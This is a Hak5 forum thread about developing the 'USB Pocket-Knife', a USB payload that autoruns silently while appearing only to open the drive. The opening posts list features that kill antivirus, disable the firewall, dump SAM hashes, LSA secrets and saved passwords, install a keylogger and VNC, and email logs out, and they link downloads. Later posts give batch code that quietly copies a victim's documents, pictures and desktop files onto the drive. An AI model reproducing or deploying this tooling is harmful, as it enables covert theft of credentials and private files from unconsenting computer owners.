Jump to content


Photo
* * * * * 2 votes

USB Pocket-Knife Development


  • Please log in to reply
818 replies to this topic

#1 Leapo

Leapo

    Hak5 Zombie

  • Members
  • PipPipPipPipPip
  • 194 posts
  • Gender:Male

Posted 16 June 2007 - 12:08 PM

Introduction:

Let me start off by saying that this is NOT YET a final payload, this threads purpose is to serve as a learning experience to me while providing a useful end-all be-all payload to the community. For now I will provide the payload in its current state at the end of this post.

This payload is the result of slowly browsing this forum and saving every bit of code and every full payload I've come across, then stitching it all together into a modular switchblade with just about every feature in existence. I've gone through and fully commented most of the code (still working on that), I've made sure everything is virus free, I've separated out major functions so that they can be turned on and off at will, and I've made sure it runs completely silently on a U3 and non-U3 thumbdrive in the least-obvious way possible.


Current State and Features:

The following is a list of everything included in the payload:

Key:
- Non-U3 Drives Only
- U3 Drives only
- Not yet Implemented
- Everything Else

Features:
- Upon insertion, the first option in the Autorun dialog box starts the payload, while appearing only to open the drive.
- Full silent autorun with no user interaction for U3 drives.
- A "Menu.bat" is included to mange all special functions, modules, and features of the switchblade.
- Payload checks the root of the C: drive and prevents the payload from running if the file "Safety.txt" is found.
- Includes TightVNC viewer so you always have it with you.
- Includes Notepad++ for easy batch editing.
- Includes antidote batch files for Nmap, the Hacksaw, and VNC.
- Fully commented code and fully featured ReadMe with instructions on setting up the payload for your needs.
- A custom backup and restore script, which automatically restores the switchblade (to the last time it was backed up) before every run. This ensures the payload is always put back to a normal state, even after it's been nuked by an antivirus.
- A custom auto-update script that goes out and downloads the most recent versions of many of the tools used on the switchblade (pwdump, nircmd, etc). Simply run it from Menu.bat, and the tools will be downloaded, extracted, and installed into the payload. The backup archive for the entire payload will also be updated to keep the latest versions of the files from being overwritten by an old backup. *working on a way to get this working for U3 drives.
- Auto Compress logs as they are generated to save space
- Email logs Back to yourself
- Optional auto-repack of executable to circumvent AV detection

Payload Components:
- Runs AVKill (csrss.exe)
- Restores the payload to the last backup point
- Disables the Windows Firewall Silently
- Hides Hidden and System Files
- Enables the Remote Desktop service
- Dumps general System Info
- Dumps the SAM
- Dumps LSA secrets
- Dumps LSA secrets via an alternate method (less detectable, not as pretty)
- Dumps Network Passwords
- Dump messenger passwords
- Dump IE passwords.
- Dump saved wireless keys
- Dump URL history
- Dump Firefox passwords (Supports Firefox 3))
- Dump Cache Passwords
- Dump Current Network Services
- Generic Port Scanning
- Dumps current external IP
- Dumps email, messenger, and general website passwords
- Dumps currently installed hot fixes and IE history
- Dumps Google Chrome passwords
- Installs Hacksaw the usual way
- Installs WinVNC client.
- Installs Nmap as a service (emails you results like the Hacksaw)
- Installs a keylogger which emails its logs off to you daily [Broken!]
- File slurping for logs, chat-logs, downloads, bookmarks, etc. (smaller files)
- File slurping for various Documents and Media folders. (larger files)
- Opens an explorer window to the Documents folder when finished
- Automatic update scrip to keep various executables up to date.
- Compress logs as they are generated to save space.
- Optionally email logs in addition to storing them on the switchblade.
- Management interface to manage the various functions of the pocket Knife.
- Ability to save up to 3 configuration profiles [New!]

#2 Leapo

Leapo

    Hak5 Zombie

  • Members
  • PipPipPipPipPip
  • 194 posts
  • Gender:Male

Posted 16 June 2007 - 12:09 PM

Modules In Development:

CODE
Please Stand By


#3 Leapo

Leapo

    Hak5 Zombie

  • Members
  • PipPipPipPipPip
  • 194 posts
  • Gender:Male

Posted 16 June 2007 - 12:09 PM

Known Bugs:
  • Keylogger is currently non-functional
  • Payload may cause No Disk errors on systems with card readers (will be fixed in next version)


#4 Leapo

Leapo

    Hak5 Zombie

  • Members
  • PipPipPipPipPip
  • 194 posts
  • Gender:Male

Posted 16 June 2007 - 12:30 PM

Download Payload:

Here' s where you'll find the most recent full build of my payload; I'll try to keep this as up-to-date as I can as I receive and work out fixes and optimizations. I'll always post a notification when a new version is available, or when an update is made to the code in my above posts.

Current Version: USB Pocket Knife 0.8.8.0 by Leapo
Release Date: October 6, 2008
Download Mirrors: MegaUpload, and RapidShare

Note: The above includes both the U3 and non-U3 versions of the payload. The ISO is now pre-built, just flash and go!!!

Payload Change Log:

October 6, 2008: Pocketknife 0.8.8.0 Released
Change 0: Payload can now be set to shutdown the PC after its finished.
Change 1: Now dumps Google Chrome passwords.
Change 2: New profile management system, save up to 3 payload configurations!
Change 3: If "Safety.txt Check" is disabled Menu.bat will now show the "run payload" option even if Safety.txt is found.
Change 4: made some cosmetic fixes to Menu.bat.
September 28, 2008: Pocketknife 0.8.7.0 Released
Change 0: Backup Script in menu.bat works again.
Change 1: Auto-Update script in menu.bat works again.
Change 2: Many path errors fixed.
Change 3: Added OS detection to increase compatibility.
Change 4: Slurp now uses variables instead of hard paths to improve compatibility.
Change 5: Slurp now grabs data from Pidgen.
Change 6: Prebuilt U3 ISO included!
September 19, 2008: Pocketknife 0.8.6.5 Released
Change 0: Invalid directory name broke just about all of 0.8.6.0, this has been corrected.
Change 1: AVKill's executable was missing from the U3 version of the payload.
Change 2: File Copiers executable was missing entirely.
September 15, 2008: Pocketknife 0.8.6.0 Released
Change 0: Fixed U3 compatibility (was broken in 0.8.5.5)
Change 1: Slurp 2 should now work properly.
September 17, 2008: Pocketknife 0.8.5.5 Released
Change 0: Fixed "Port Scan" not running correctly.
Change 1: PwDump failing to create service.
Change 2: FgDump failing to output anything.
Change 3: Firepassword updated, now works with Firefox 3.0
Change 4: PwDump Updated to 1.7.2
Change 5: FgDump updated to 2.1.0
September 14, 2008: Pocketknife 0.8.5.0 Released
Change 0: Animation_1.cfg was missing, causing some features of menu.bat to malfunction.
Change 1: Fixed an ordering issue in Start.bat.
Change 2: Fixed an issue with GO.vbs causing it to start more than one copy of Start.bat
Change 3: Fixed a typo preventing the "Dump Mail Passwords" module from running.
Change 4: Fixed a typo preventing the "Dump Updates-List" module from running.
Change 5: Fixed "Dump Mail passwords" not running correctly.
Change 6: Fixed "Dump Network passwords" not running correctly.
Change 7: Fixed "Dump Messenger passwords" not running correctly.
Change 8: Fixed "Dump LSA Secrets" not running correctly.
Change 9: AVKill Should now operate silently.
Change 10: File structure created by slurp was cleaned up.
Change 11: Folder now opens AFTER the payload finishes, not before (if it's selected to open at all).
September 11, 2008: Pocketknife 0.8.2.0 Released
Change 0: Bug causing safety.txt to be ignored fixed.
Change 1: "No Disk" errors should be resolved.
Change 2: New "disarm' feature to prevent it from starting at all.
Change 3: three options on what folder to open after completion: Logs, Root, or None.
Change 4: ReadMe brought up to date.
Change 5: "Disable Firewall" is now totally silent (disables security center first)
August 31, 2008: Pre-Release 0.8.1.0 Released
Change 0: Now fully U3 compatible (fixed from v0.8.0.0)
Change 1: Menu.bat has been greatly reduced in size.
June 09, 2008: Pre-Release 0.8.0.0 Released
Change 0: Payload overhauled from the ground up.
Change 1: Now fully U3 compatible (broken in this build).
Change 2: Menu system overhauled.
Change 3: Both versions of the payload launch silently for sure!
November 24, 2007: U3 ISO
Change 0: Fixed the U3 ISO to launch the payload silently
November 10, 2007: Beta 0.6.2.1 Release
Change 0: VNC install method updated.
Change 1: Backup and Restore Script streamlined.
Change 2: Automatic Updates added.
Change 3: Centralized Management Interface added.
June 20, 2007: Beta 0.4 Release
Change 0: Added a custom backup and restore script (restores the payload before every run to keep it safe from AV software).
Change 1: Updated the Readme with new information about the backup and restore function, PLEASE READ THE README!
Change 2: Improved and added more comments to the code.
Change 3: Fixed various typos in my comments.
June 18, 2007: Beta 0.3 Release
Change 0: Completely overhauled Slurp and Slurp2.bat
Change 1: Fixed Port_Scan.bat (thanks go to Elmer and GonZor for their help).
Change 2: Improved and added more comments to the code.
Change 3: Fixed various typos in my comments.
June 16, 2007: Initial Post
Change 0: Initial Release

#5 Leapo

Leapo

    Hak5 Zombie

  • Members
  • PipPipPipPipPip
  • 194 posts
  • Gender:Male

Posted 16 June 2007 - 12:44 PM

Reserved for future use by OP due to character limits...

#6 elmer

elmer

    Hak5 Zombie

  • Members
  • PipPipPipPipPip
  • 210 posts
  • Gender:Male
  • Location:/na/usa/ca

Posted 16 June 2007 - 12:52 PM

Holy USB Hacks, Batman! This is cool. I can't wait to download it. How long did it take you to make this?
archlinux

#7 setzer1411

setzer1411

    Hak5 Fan +

  • Members
  • PipPipPip
  • 52 posts
  • Location:Texas

Posted 16 June 2007 - 01:15 PM

a shit ton of potential here, cant wait to see the outcome...
What greater purpose can you have the collecting knowledge, purely for the sake of knowledge?

#8 Leapo

Leapo

    Hak5 Zombie

  • Members
  • PipPipPipPipPip
  • 194 posts
  • Gender:Male

Posted 16 June 2007 - 01:32 PM

Download link posted, have at it! Any fixes you guys come up with I'll add to the payload, let's see if we can make this "the one".
As for how long I've been working on it...well, I've been slowly building it since the original hacksaw came out.

(not bad for my 10th through 14th posts  :lol: )

I'll keep hammering away on my end, I really want to change the slurp.bat and slurp2.bat files over to FileCopy (FC.exe) instead of xCopy to remove the need to make a new xCopy command for every file extension you want to slurp. I'll probably have it all fixed by tonight, but feel free to use the current incarnation of Slurp, it just isn't quite as efficient as the new version will be.

#9 elmer

elmer

    Hak5 Zombie

  • Members
  • PipPipPipPipPip
  • 210 posts
  • Gender:Male
  • Location:/na/usa/ca

Posted 16 June 2007 - 02:16 PM

I'm downloading it right now. I am going to read it all, then post any fixes I have. Oh, if you need more mirrors, I put this on MegaUpload, FileSend, Deposit Files, FlyUpload, and  Badongo (I really don't want this to get lost, like hackblade.rar).
archlinux

#10 Leapo

Leapo

    Hak5 Zombie

  • Members
  • PipPipPipPipPip
  • 194 posts
  • Gender:Male

Posted 16 June 2007 - 02:35 PM

Holy cow elmer, thanks! You got those mirrors up darn quick!

I'm going to go ahead and add those mirrors to the main download post.

#11 MacMike

MacMike

    Newbie

  • Members
  • 4 posts

Posted 16 June 2007 - 03:33 PM

Works Great, Thanks. . .
But the Hacksaw won't work :(
I tried it on different computers but it didn't work
1 Time it did with some other payloader.
But the same loader on another comp didn't work anymore. . . . . . .

#12 elmer

elmer

    Hak5 Zombie

  • Members
  • PipPipPipPipPip
  • 210 posts
  • Gender:Male
  • Location:/na/usa/ca

Posted 16 June 2007 - 04:19 PM

I am going to try and make this U3 compatible.
EDIT: Just fixed the port scan (I think). The new code is:
Echo ************************************ > %~d0Documentslogfiles%computername%Port_Scan.log 2>&1
echo ************[Port Scan]************* >> %~d0Documentslogfiles%computername%Port_Scan.log 2>&1
Echo ************************************ >> %~d0Documentslogfiles%computername%Port_Scan.log 2>&1
portqry -local -l %~d0Documentslogfiles%computername%%computername%_ports.txt>>nul
type %~d0Documentslogfiles%computername%%computername%_ports.txt >> %~d0Documentslogfiles%computername%Port_Scan.log 2>&1 
del /f/q %~d0Documentslogfiles%computername%%computername%_ports.txt
You will have to uncomment it in start.bat to make it work.

Also, I like the safety thing. Pretty neat.
archlinux

#13 Leapo

Leapo

    Hak5 Zombie

  • Members
  • PipPipPipPipPip
  • 194 posts
  • Gender:Male

Posted 16 June 2007 - 09:19 PM

@ MakMike:
That's strange, considering I use the same method of launching the hacksaw that's employed on U3 distributions of the Hacksaw. I downloaded the original U3 hacksaw (the same one used on the show), copied the thumbdrive portion directly over to my payload, then I pulled the vb script they used to start the switchblade from the CD partition, decoded it, and modified it to work from the WIPCMD folder.

In other words, if the original "as-seen-on-tv" hacksaw works, so should my hacksaw, because all that was changed was a path or two.

Are you sure you edited send.bat correctly? If you don't enter the information exactly right, it'll just silently fail to send. Also, make sure you're using a Gmail password that contains NO SPACES; passwords with spaces aren't properly supported (everything after the first space is ignored).


@ elmer:
Thanks for the fix, I'll test it out a little and add it to the payload, along with my new versions of Slurp and Slurp2.bat...after I compare it to my busted code to see what you had to change to fix it XD

#14 elmer

elmer

    Hak5 Zombie

  • Members
  • PipPipPipPipPip
  • 210 posts
  • Gender:Male
  • Location:/na/usa/ca

Posted 16 June 2007 - 11:16 PM

I forgot how to copy multiple files/file types with fc.exe, so tell me if you know how. I checked in the /? (fc.exe /?) and it didn't say anything about it. I PM'd Obi-Wahn, but he hasn't gotten back to me yet.

EDIT: You should try to get on Hak5Live RC1.5. The RC1 had some community stuff in it, and some air time couldn't hurt.
archlinux

#15 Leapo

Leapo

    Hak5 Zombie

  • Members
  • PipPipPipPipPip
  • 194 posts
  • Gender:Male

Posted 17 June 2007 - 12:43 AM

Well, bad news elmer, I'm getting no output from the code you posted. It looks like the batch file isn't finding the executable (PortQry.exe) that's sitting in the folder with it. The "CD" command I had in there before fixed this issue, but it broke other batch files when run in succession...


Edit: Getting fc.exe to copy multiple files of multiple types is pretty darn easy compared to xCopy. The example code below will copy everything from the ".TestCopy From" folder to the ".TestCopy To" folder (this includes sub folders and anything located within them)
CODE
fc.exe ".TestCopy From*" ".TestCopy To*" /i /o


So for example, here's what Slurp2.bat (used for copying the entire contents of the My Documents folder and Desktop) looks like using xCopy:
CODE
:: My Documents files
mkdir ....Documentslogfiles%computername%Slurp_DataMyDocuments
mkdir ....Documentslogfiles%computername%Slurp_DataMyMusic
mkdir ....Documentslogfiles%computername%Slurp_DataMyVideos
mkdir ....Documentslogfiles%computername%Slurp_DataMyPictures
xcopy "C:Documents and Settings%username%My Documents*.doc" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.docx" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.rtf" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.txt" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.xls" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.csv" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.ppt" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.pptx" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.mdb" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.jpg" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.png" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.bmp" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.gif" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.htm" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.html" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.eml" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.msg" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.zip" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.rar" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.7z" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.psd" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.jpg" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.wma" ....Documentslogfiles%computername%Slurp_DataMyMusic /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.wav" ....Documentslogfiles%computername%Slurp_DataMyMusic /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.mp3" ....Documentslogfiles%computername%Slurp_DataMyMusic /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.ogg" ....Documentslogfiles%computername%Slurp_DataMyMusic /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.mpg" ....Documentslogfiles%computername%Slurp_DataMyVideos /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.avi" ....Documentslogfiles%computername%Slurp_DataMyVideos /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.wmv" ....Documentslogfiles%computername%Slurp_DataMyVideos /s/c/q/r/h

:: Desktop files
mkdir ....Documentslogfiles%computername%Slurp_DataDesktop
xcopy "C:Documents and Settings%username%Desktop*.doc" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.rtf" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.txt" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.xls" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.csv" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.ppt" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.mdb" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.jpg" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.gif" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.htm" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.eml" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.msg" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h


And here's what it looks like using FileCopier (fc.exe):
CODE
:: My Documents files
mkdir ....Documentslogfiles%computername%Slurp_DataMyDocuments
fc.exe "C:Documents and Settings%username%My Documents*" "....Documentslogfiles%computername%Slurp_DataMyDocuments*" /i /o

:: Desktop files
mkdir ....Documentslogfiles%computername%Slurp_DataDesktop
fc.exe "C:Documents and Settings%username%Desktop*" "....Documentslogfiles%computername%Slurp_DataDesktop*" /i /o


many thanks to Obi-Wahn for making such a helpful application!

#16 GonZor

GonZor

    Hak5 Pirate

  • Members
  • PipPipPipPipPipPip
  • 352 posts
  • Location:Australia

Posted 17 June 2007 - 06:40 AM

Hey I haven't downloaded your payload yet to test but I noticed this line in your code for the scan

CODE
copy Documentslogfiles%computername%Port_Scan.log+Documentslogfiles%computername%%computername%_ports.log >>nul


the syntax for copy is

CODE
COPY <file1>+<file2> <dest>


you'll notice you don't have a destination you just move the data to NUL put your destination in and it should work fine.

If it isn't finding "PortQry.exe" call th file like so ".PortQry.exe" this will look for the file in where the batch file is located.

By the way I think Ill have to challenge you for the the title of this payload being "the one", sorry.
GonZor's SwitchBlade
----------
Remember not to forget that which you did not need to know...

#17 Leapo

Leapo

    Hak5 Zombie

  • Members
  • PipPipPipPipPip
  • 194 posts
  • Gender:Male

Posted 17 June 2007 - 07:39 AM

Thanks for the tip GonZor, I'll give that a shot (I wasn't the original author of that particular chunk of code, so I wasn't exactly sure  what was had going on there).

As for who's payload is 'the one'... you do have the advantage of having your payload on the U3 section of the flash drive, which keeps everything safe from deletion by an antivirus and makes sure it auto-runs without any user-interaction, but there are quite a few trade-offs for doing it that way (yours can't be installed on a USB hard disk and used for mass file slurping for instance). Now it isn't like my payload is completely perfect either, but were still debugging the darn thing in here :P

I've just downloaded your payload, and I see I have a few things you don't, and you have a few things I don't. Considering my payload is already a compilation of over 5 other payloads, would you mind if I added some code from yours into the mix as well? :D

#18 GonZor

GonZor

    Hak5 Pirate

  • Members
  • PipPipPipPipPipPip
  • 352 posts
  • Location:Australia

Posted 17 June 2007 - 09:01 AM

QUOTE
Thanks for the tip GonZor, I'll give that a shot (I wasn't the original author of that particular chunk of code, so I wasn't exactly sure  what was had going on there).

As for who's payload is 'the one'... you do have the advantage of having your payload on the U3 section of the flash drive, which keeps everything safe from deletion by an antivirus and makes sure it auto-runs without any user-interaction, but there are quite a few trade-offs for doing it that way (yours can't be installed on a USB hard disk and used for mass file slurping for instance). Now it isn't like my payload is completely perfect either, but were still debugging the darn thing in here :P

I've just downloaded your payload, and I see I have a few things you don't, and you have a few things I don't. Considering my payload is already a compilation of over 5 other payloads, would you mind if I added some code from yours into the mix as well? :D


No problem, It is possible for my payload to run on any drive actually :-P I my completely bias opinion I'd say the best thing about my payload is the fact it is customizable from a gui, no more editing code but considering both our payloads are still in development we will have to wait to see who's will be better, or we could put them together to create "the ULTIMATE one"? maybe. Anyway if you need help let me know.
GonZor's SwitchBlade
----------
Remember not to forget that which you did not need to know...

#19 setzer1411

setzer1411

    Hak5 Fan +

  • Members
  • PipPipPip
  • 52 posts
  • Location:Texas

Posted 17 June 2007 - 01:17 PM

holy hell this is badass, i cant wait for the u3 version, this is great
What greater purpose can you have the collecting knowledge, purely for the sake of knowledge?

#20 Leapo

Leapo

    Hak5 Zombie

  • Members
  • PipPipPipPipPip
  • 194 posts
  • Gender:Male

Posted 18 June 2007 - 06:22 AM

First things first, a new version has been released! Major highlights for this release include completely overhauled versions of Slurp and Slurp2.bat (now renamed fc_slurp and fc_slurp2.bat), a fixed version of Port_Scan.bat (thanks go to Elmer and GonZor for their help), and improvements to my code comments such as typo fixes and additional information.

So, version 0.3 is now up the download link is in the usual place (in the 4th post of the thread, along with a change log)... Or if you're all too lazy to scroll up to my original posts, here are the links for Rapidshare and MegaUpload. :lol:

@ Elmer and GonZor:
Thanks for the help with this pesky module, it took a little more tweaking to get Port_Scan.bat to work properly, but I finally managed to get it to play nice with the other modules. It might be a tad unconventional, but at least it works:
CODE
mkdir ....Documentslogfiles%computername%
Echo ************************************ > ....Documentslogfiles%computername%Port_Scan.log 2>&1
echo ************[Port Scan]************* >> ....Documentslogfiles%computername%Port_Scan.log 2>&1
Echo ************************************ >> ....Documentslogfiles%computername%Port_Scan.log 2>&1
.portqry -local -l ....Documentslogfiles%computername%%computername%_ports.txt>>nul
type ....Documentslogfiles%computername%%computername%_ports.txt >> ....Documentslogfiles%computername%Port_Scan.log 2>&1
del /f/q %~d0Documentslogfiles%computername%%computername%_ports.txt


@ GonZor:
Interesting proposition, merging our payloads, but how would we go about it? At this point, most of my code would need to be overhauled to work with the rest of your payload, but it looks like bringing over the modules I'm missing from your payload would be relatively easy...seems a shame, though, considering how clean your code is compared to mine (though mine doesn't need to be as clean due to the use of Start.bat to manage active modules).

@ Elmer:
You mentioned something about attempting to make my payload U3 compatible; if that works out, and I converted over the modules from GonZor's payload that I don't have, the only thing his current payload would have over mine is that it runs completely off of the CD partition of the U3 drive. If there's a way to keep the non-U3 portion of a flash drive safe from being nuked by Antivirus software, this might just be the way to go.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users